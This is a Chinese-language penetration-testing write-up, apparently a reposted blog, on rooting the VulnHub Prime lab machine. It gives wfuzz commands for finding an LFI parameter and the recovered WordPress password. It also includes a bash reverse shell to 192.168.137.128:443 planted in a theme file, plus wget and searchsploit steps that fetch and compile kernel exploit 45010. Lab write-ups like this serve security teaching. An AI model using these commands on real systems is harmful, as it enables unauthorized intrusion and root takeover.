2026-03-18 17:57:23 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文记录了VulnHub平台Prime靶机的渗透测试全过程。作者通过端口扫描发现Web服务，利用wfuzz工具进行模糊测试发现LFI漏洞，进而读取敏感文件获取WordPress后台密码。登录后台修改主题文件写入反弹Shell获取初始权限，最终通过内核漏洞提权成功获得Root权限。文章展示了从信息收集到提权的完整实战流程，强调了参数模糊测试的重要性。 综合评分： 81 文章分类： 渗透测试,WEB安全,实战经验,CTF,内网渗透

cover_image

跟着红队笔记打靶：prime

原创

网安热爱者week 网安热爱者week

week的杂货铺

2026年3月8日 23:25 江苏

靶机地址：

https://www.vulnhub.com/entry/prime-1,358/

大佬的视频：

【「红队笔记」靶机精讲：Prime1 – 信息收集和分析能力的试炼，试试吧，按图索骥！】https://www.bilibili.com/video/BV1yP41177h7?vd_source=3caf2dac9c9273de4d9b0fead4712250

1. 信息搜集

1.1. 主机发现：

143是靶机

1.2. 端口扫描：

tcp：

只有22和80

udp:

1.3. 详细扫描：

nmap内置脚本扫出来一个wordpress

2. 渗透测试：

80的目录扫描：

扫了一下其它的特殊后缀文件：

让我们访问：

https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web

里面讲了wfuzz工具的使用这是一个参数发现的工具。

并让我们发现更多的php页面使用这个工具进行fuzz参数。

发现一个image.php，而且访问是和index.php是一样的页面。

这里就会有点怀疑是文件包含了

使用wfuzz进行对这两个页面进行fuzz:

sudo wfuzz&nbsp;-c&nbsp;-w&nbsp;/usr/share/wfuzz/wordlist/general/common.txt &nbsp;--hc&nbsp;404&nbsp;http://192.168.137.143/image.php?FUZZ=somethingsudo wfuzz&nbsp;-c&nbsp;-w&nbsp;/usr/share/wfuzz/wordlist/general/common.txt &nbsp;--hc&nbsp;404&nbsp;http://192.168.137.143/index.php?FUZZ=somethingsudo wfuzz&nbsp;-c&nbsp;-w&nbsp;/usr/share/wfuzz/wordlist/general/common.txt &nbsp;--hh&nbsp;136&nbsp;http://192.168.137.143/index.php?FUZZ=something

发现在index里面有一个file参数：

根据secret.txt的提示，文件包含方式访问一下location.txt

让我们去用secrettier360参数去尝试其它的php页面

那就只剩image.php页面了。

发现已经是最后的参数了所以读一下/etc/passwd

这里给了提示：

访问之后的获得的密码：

follow_the_ippsec

这里尝试用这个密码去登入了ssh发现不太行

所以大概率是wp的账密。

用victor follow_the_ippsec 登入成功。

后台找到一个secret.php可以写入

写一个反弹shell:

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.137.128/443 0>&1'");

这是刚刚写入木马的页面位置：

http://192.168.137.143/wordpress/wp-content/themes/twentynineteen/secret.php

计划任务里面没啥东西

进home目录里面有两个用户

另一个没有权限查看。

尝试内核提权：

查看系统版本

下载下来：

searchsploit&nbsp;-m&nbsp;45010

然后开启一个py服务使得对方可以下载这个文件。

python&nbsp;-m http.server&nbsp;5566

然后使用对方的shell下载:

cd&nbsp;/tmpwget&nbsp;http://192.168.137.128:5566/45010.c

下载成功之后：

使用gcc进行编译然后运行：

gcc&nbsp;45010.c -o test

成功root~~

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：week的杂货铺网安热爱者week 网安热爱者week《跟着红队笔记打靶：prime》